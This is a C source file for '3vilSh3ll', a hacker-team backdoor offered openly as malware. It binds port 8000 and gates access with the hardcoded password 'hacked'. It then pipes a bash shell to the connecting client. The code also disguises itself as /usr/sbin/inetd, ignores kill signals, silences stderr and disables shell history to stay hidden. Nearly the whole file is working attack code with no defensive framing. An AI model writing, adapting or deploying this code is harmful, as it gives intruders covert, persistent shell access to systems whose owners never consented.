/*

————————————
– BACKDOOR BIND CONNECT –
————————————

Author info :

Code : Simpp
Contact : somebody
For : # Bad Digites Team #
Link : http://www.magichack.powa.fr/board
Why : Just for fun

Programm’s info :

name :
3vilSh3ll

Compile :
gcc -g -W -Wall -Wextra -o backdoor 3vilSh3ll.c

client :
Netcat

description :
Simple backdoor bind connect .
change the name procecus for hide the command ps .
ignore signal SIGTERM SIGINT SIGQUIT for don’t stop the backdoor .
redirect stderr in /dev/null for discret .
create procecus child for execute the evil code .
need passwd for connect backdoor .
redirect bash history (HISTFILE) in /dev/null for the new shell .
redirect stdout , stdin in socket client .

*/

/**** header ****/

#include
#include
#include
#include
#include
#include
#include
#include
#include

/**** config ****/

#define HIDE "/usr/sbin/inetd"
#define PORT 8000
#define ACL "\n\tBind Banckdoor by Simpp\n\tFor : # Bad Digites Team #\n\nPasswd : "
#define MAGIC_OK "Passwd accpet connect ...\n"
#define MAGIC_NO "Passwd error connect failed ...\n"
#define MAGIC_KEY "hacked"
#define NULL_LOG "/dev/null"
#define VAR "HISTFILE=/dev/null"
#define CMD "/bin/bash"

/**** structure socket ****/

typedef struct _socket_client_s {
int socket_cli;
struct sockaddr_in from;
socklen_t fromlen;
} socket_client_t;

typedef struct _socket_server_s {
int socket_serv;
struct sockaddr_in addr;
} socket_server_t;

/**** prototype fonction socket server ****/

int socket_server_new(socket_server_t *server);
int socket_server_bind(socket_server_t *server);
int socket_server_listen(socket_server_t *server);
int socket_server_accept_client(socket_server_t *server, socket_client_t *client);
void socket_server_free(socket_server_t *server);

/**** prototype fonction socket client ****/

int socket_client_send(int socket_cli, const char *txt);
int socket_client_recv(int socket_cli, char **buff);
int socket_client_connect_dup2(int socket);
void socket_client_free(socket_client_t *client);

/**** prototype fonction else ;) ****/

void hidden_process(char *argv[]);
void ignore_signal(void);
void clean_log(void);
int redirect_bash_history(void);
int child(void);
void client_fonction(socket_server_t *server);
int check_client(int socket_cli);
int check_passwd(char *pass);

/**** main programm's ****/

int main(int argc, char *argv[])
{
(void) argc;
(void) argv;

pid_t pid;

hidden_process(argv);
clean_log();
ignore_signal();

pid = fork();
if ( pid == -1 ) {
printf("fork() failed\n");
return EXIT_FAILURE;
}

if ( pid )
exit(0);

if ( !pid ) {

if ( child() == -1 )
return EXIT_FAILURE;

}

return EXIT_SUCCESS;
}

/**** fonction socket server ****/

int
socket_server_new(socket_server_t *server)
{
server->socket_serv = socket(AF_INET, SOCK_STREAM, 0);

if ( server->socket_serv == -1 )
return -1;

server->addr.sin_family = AF_INET;
server->addr.sin_port = htons(PORT);
server->addr.sin_addr.s_addr = INADDR_ANY;

return 0;
}

int
socket_server_bind(socket_server_t *server)
{
int ret;

ret = bind(server->socket_serv, (struct sockaddr *)&server->addr, sizeof(server->addr));

if ( ret == -1 )
return -1;

return 0;
}

int
socket_server_listen(socket_server_t *server)
{
int ret;

ret = listen(server->socket_serv, 10000);

if ( ret == -1 )
return -1;

return 0;
}

int
socket_server_accept_client(socket_server_t *server, socket_client_t *client)
{
client->fromlen = sizeof(struct sockaddr);

client->socket_cli = accept(server->socket_serv, (struct sockaddr *)&client->from, &client->fromlen);

if ( client->socket_cli == -1 )
return -1;

return 0;
}

void
socket_server_free(socket_server_t *server)
{
if ( server != NULL ) {

if ( server->socket_serv != -1 )
close(server->socket_serv);

free(server);
server = NULL;
}
}

/*************************************************************/

/**** fonction socket client ****/

int
socket_client_send(int socket_cli, const char *txt)
{
int ret;

ret = write(socket_cli, txt , strlen(txt));

if ( ret == -1 )
return -1;

return 0;
}

int
socket_client_recv(int socket_cli, char **buff)
{
int ret;

memset(*buff, 0, 50);

ret = read(socket_cli, *buff, 50);

if ( ret == -1 )
return -1;

return 0;
}

int
socket_client_connect_dup2(int socket)
{
int ret1, ret2;

close(0);
close(1);
ret1 = dup2(socket, 0);
ret2 = dup2(socket, 1);

if ( ret1 == -1 || ret2 == -1 )
return -1;

return 0;
}

void
socket_client_free(socket_client_t *client)
{
if ( client != NULL ) {

if ( client->socket_cli != -1 )
close(client->socket_cli);

free(client);
client = NULL;
}
}

/*************************************************************/

/**** fonction else ****/

void
hidden_process(char *argv[])
{
strcpy(argv[0], HIDE);
}

void
clean_log(void)
{
int log;

close(2);
close(3);

log = open(NULL_LOG, O_WRONLY);

dup2(log, 2);
dup2(log, 3);

close(log);

}

void
ignore_signal(void)
{
signal(SIGQUIT, SIG_IGN);
signal(SIGTERM, SIG_IGN);
signal(SIGINT, SIG_IGN);
}

int
redirect_bash_history(void)
{

if ( putenv(VAR) == -1 )
return -1;

return 0;
}

int
child(void)
{
socket_server_t *server = malloc(sizeof(socket_server_t));

if ( server == NULL ) {
printf("malloc *server failed\n");
return -1;
}

if ( socket_server_new(server) == -1 ) {
printf("create new socket server failed\n");
return -1;
}

if ( socket_server_bind(server) == -1 ) {
printf("socket server bind failed\n");
return -1;
}

if ( socket_server_listen(server) == -1 ) {
printf("socket sever listen failed\n");
return -1;
}

if ( redirect_bash_history() == -1 )
printf("redirect HISTFILE on /dev/null failed\n");

while ( 1 ) {

client_fonction(server);

}

socket_server_free(server);
}

void
client_fonction(socket_server_t *server)
{

socket_client_t *client = malloc(sizeof(socket_client_t));

if ( client == NULL )
return;

if ( socket_server_accept_client(server, client) != -1 ) {

if ( check_client(client->socket_cli) != -1 ) {

if ( socket_client_connect_dup2(client->socket_cli) != -1 ) {

system(CMD);

}

}
}

socket_client_free(client);
}

int
check_client(int socket_cli)
{
char *passwd = malloc(50 * sizeof(char));

if ( passwd == NULL )
return -1;

if ( socket_client_send(socket_cli, ACL) == -1 )
return -1;

if ( socket_client_recv(socket_cli, &passwd) == -1 )
return -1;

if ( check_passwd(passwd) == -1 ) {

if ( socket_client_send(socket_cli, MAGIC_NO) == -1 )
return -1;

return -1;
}

else {

if ( socket_client_send(socket_cli, MAGIC_OK) == -1 )
return -1;
}

free(passwd);
passwd = NULL;

return 0;
}

int
check_passwd(char *pass)
{
char *buff = NULL;

buff = strtok(pass, "\n");

if ( !strcmp(MAGIC_KEY, buff) )
return 0;

else
return -1;

}

/*************************************************************/

/*####################### END #######################*/